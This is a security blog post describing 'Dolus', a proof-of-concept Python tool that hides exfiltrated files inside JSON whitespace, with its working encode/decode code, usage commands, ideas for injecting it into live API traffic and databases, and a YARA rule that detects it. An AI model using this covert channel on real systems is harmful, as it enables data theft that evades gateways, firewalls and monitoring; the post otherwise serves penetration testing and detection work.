
Covert Data Exfiltration via JSON in an API
I’ve been thinking a lot lately about methods for covert data exfiltration when hacking APIs.
These days, API gateways, web application firewalls (WAF), and even intrusion detection sensors (IDS) have wised up to secondary data streams leaving API servers. It’s not uncommon to find security controls blocking anything except the API requests and responses themselves.
Is there any way for us to hide data in plain sight within those responses?
It ends up there is.
You can smuggle data directly in the JSON payloads, if you know what you’re doing.
Let me show you how.
Understanding the grammar of JSON
If you look closely at RFC8259, which describes the grammar of JSON, you will notice that several characters are considered “insignificant whitespace” and are ignored or parsed out when processed.
These include Spaces, Tabs, Line Feeds, and Carriage Returns:
ws = *(
%x20 / ; Space
%x09 / ; Horizontal tab
%x0A / ; Line feed or New line
%x0D ) ; Carriage return
Knowing that we can use this whitespace to encode arbitrary data, we want to exfiltrate in a way that a human will probably not notice since it’s pretty much invisible to the naked eye.
Let me show you what I mean.
Consider two JSON files named input.json
and output.json
, respectively. If we were to cat them out and pipe them into jq, we can see that they parse cleanly with the same key/value pair of Hello/World in both cases.

However, the size of the files is considerably different. That’s because the output.json has a binary file embedded in it, encoded using this “insignificant whitespace.”

How? It was done through a proof-of-concept (PoC) Python script I wrote called Dolus.
WTF is Dolus?
Dolus was a figure in Greek mythology associated with trickery, deception, and cunning.
He was considered a personification of deceit and was often depicted as a companion or servant of the god Hermes, who was also known for his cunning and trickery. Dolus was sometimes portrayed as a figure who could create false appearances and lead people astray, embodying the concept of deliberate mischief and guile.
That seemed like the perfect name for a script that would let us abuse the JSON payloads in an API to exfiltrate data. A bit of cunning. A bit of deception. And a whole lot of luck.
The cunning bit of code
You know how the BASE2 numeral system represents the 0s and 1s in a binary system? And how BASE16 represents the 16 characters of 0-9 and A-F in a hexadecimal system?
Well, Dolus works similarly to encode binary data using a custom BASE4 numeral system.
Dolus represents numbers using a set of the four whitespace characters that the JSON RFC denotes as insignificant to its parsing: horizontal tab (\t), line feed (\n), carriage return (\r), and space ( ), mapping numerical values 0, 1, 2, and 3 to these symbols, respectively.
I can then use that to convert bytes of data to and from BASE4.
SYMBOLS = [0x09, 0x0a, 0x0d, 0x20]
def get_index(symbol):
try:
return SYMBOLS.index(symbol)
except ValueError:
raise ValueError(f"Symbol {symbol} not found in SYMBOLS")
def bytes_to_base4(input_bytes) -> bytes:
base4_string_buffer = []
for byte in input_bytes:
quotient = byte
base4_digits = [0] * 8
for j in range(7, -1, -1):
base4_digits[j] = SYMBOLS[quotient % 4]
quotient //= 4
base4_string_buffer.extend(base4_digits)
return bytes(base4_string_buffer)
def base4_to_bytes(base4_string_buffer):
size_base4_string_buffer = len(base4_string_buffer)
n = size_base4_string_buffer // 8
byte_string_buffer = bytearray(n)
for i in range(n):
byte = 0
for j in range(8):
byte = (byte << 2) | get_index(base4_string_buffer[i * 8 + j])
byte_string_buffer[i] = byte
return bytes(byte_string_buffer)
The deception bit of code
Once the bytes of the data we want to exfiltrate are converted into the custom BASE4 format, we can embed it into the JSON payload. I did this by appending a special sequence of characters, which I call a “demark sequence,” to the JSON so I knew exactly where my exfil data was. Anything after that is BASE4 data I can easily parse out.
Here is what the encoding and decoding look like:
# DEMARK Sequence
DEMARK = b'\x0d\x0a\x09\x20'
def get_bytes_after_marker(data: bytes, marker: bytes) -> bytes:
index = data.find(marker)
if index != -1:
return data[index + len(marker):]
return bytes()
def encode(input_file, output_file, exfil_file):
exfil_data = read_file_to_bytes(exfil_file)
encoded_bytes = bytes_to_base4(exfil_data)
with open(input_file, 'rb') as file:
file_content = file.read()
encoded_content = file_content + DEMARK + encoded_bytes
with open(output_file, 'wb') as file:
file.write(encoded_content)
def decode(input_file, output_file):
encoded_data = read_file_to_bytes(input_file)
b4_exfil_data = get_bytes_after_marker(encoded_data, DEMARK)
if b4_exfil_data:
exfil_data = base4_to_bytes(b4_exfil_data)
else:
print("Hidden data marker not found. Aborting")
sys.exit(-1)
with open(output_file, 'wb') as file:
file.write(exfil_data)
Using Dolus to exfiltrate data in JSON
The basic usage for Dolus is as follows:
Encoding: ./dolus.py -i input.json -o output.json -x file.bin -e
Decoding: ./dolus.py -i output.json -o file.bin -d
Of course, you probably won’t be moving JSON via separate files during an actual engagement. This is a perfect place where you can tap the HTTP stream on the web server and inject the data as the JSON payload leaves the server. You can then write your own Burp Suite extension to capture and strip the exfiltrated data on the fly as the data flows through the attack proxy.
As a second example, I’ve used this technique to hide malicious data inside the JSON documents in an Azure CosmosDB collection. (Don’t ask)
These are just a couple of ways of using this technique. How you use it is really up to you.
Detecting this exfiltration technique
While normal people typically won’t notice when you smuggle data using JSON like this, it is detectable.
It’s uncommon to see more than 8 “insignificant whitespace” characters in a row in a JSON payload. Stefan Grimminck created a YARA rule that the blue team can use to look for this sort of thing:
rule Detect_Hidden_Data_In_Files {
meta:
author = "Stefan Grimminck"
description = "Detects hidden whitespace data in JSON files"
date = "2024-02-05"
strings:
$hidden_data = /[\x20\x09\x0A\x0D]{8,}/
condition:
$hidden_data
}
Pretty simple. Yet pretty powerful.
Conclusion
Dolus represents a novel approach to covert data exfiltration by exploiting JSON payloads. With API gateways, WAFs, and IDS increasingly vigilant against secondary data streams, embedding data within the JSON payloads offers a stealthy alternative.
This technique has vast practical applications, from injecting data into HTTP streams to hiding malicious content in structured and unstructured databases. While this method is powerful, it is not undetectable. Security teams can employ YARA rules to identify unusual sequences of whitespace characters in the HTTP response bodies and detect potential exfiltration.
Dolus is a testament to the blend of technical ingenuity and mythological inspiration. Credit for the foundational idea goes to Stefan Grimminck, whose insights on data smuggling in JSON sparked the development of this tool. For those interested, the latest iteration of the Dolus proof-of-concept code is available for further exploration.
Hack hard!
One last thing…

Have you joined The API Hacker Inner Circle yet? It’s my FREE weekly newsletter where I share articles like this, along with pro tips, industry insights, and community news that I don’t tend to share publicly. If you haven’t, subscribe at https://apihacker.blog.
The post Covert Data Exfiltration via JSON in an API appeared first on Dana Epp's Blog.
*** This is a Security Bloggers Network syndicated blog from Dana Epp's Blog authored by Dana Epp. Read the original post at: https://danaepp.com/covert-data-exfiltration-via-json-in-an-api